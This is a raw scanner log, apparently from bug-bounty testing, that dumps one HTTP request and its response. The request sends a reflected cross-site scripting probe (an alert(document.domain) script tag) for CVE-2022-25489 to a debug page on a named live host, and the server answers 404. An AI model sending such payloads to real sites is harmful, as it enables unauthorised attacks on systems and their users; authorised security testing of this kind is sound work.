[CVE-2022-25489] Dumped HTTP request for https://techsolutions.bitpanda.com/widgets/debug.php?a=<script>alert(document.domain)</script>


GET /widgets/debug.php?a=<script>alert(document.domain)</script> HTTP/1.1
Host: techsolutions.bitpanda.com
User-Agent: Mozilla/5.0 (Ubuntu; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Accept: */*
Accept-Language: en
X-Bug-Bounty: Bugcrowd-eno@bugcrowdninja.com
Accept-Encoding: gzip


[CVE-2022-25489] Dumped HTTP response https://techsolutions.bitpanda.com/widgets/debug.php?a=<script>alert(document.domain)</script>

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 9
Cache-Control: max-age=30
Content-Type: text/plain
Date: Tue, 05 Aug 2025 12:53:23 GMT
Strict-Transport-Security: max-age=31536000
Via: 1.1 e401756dd494b6bbc4d871b5300eb096.cloudfront.net (CloudFront)
X-Amz-Cf-Id: n1hoKvgYtuxrCivr4H4LM6A4jYUSm6jQyB1BK4C6nMMlcMlZHdsaTQ==
X-Amz-Cf-Pop: IAD55-P8
X-Amz-Id-2: nvKEcpRKZa44JEi5Q7I7DwWxjydM0cjSW5G9ZGx806+z1qk4lzvM/a+VefS7A7FiD/BaVfwMLKUYluVXgaRi4aB8x6PquOL6
X-Amz-Request-Id: 41Z3008KH6RV2GWW
X-Cache: Error from cloudfront

Not Found
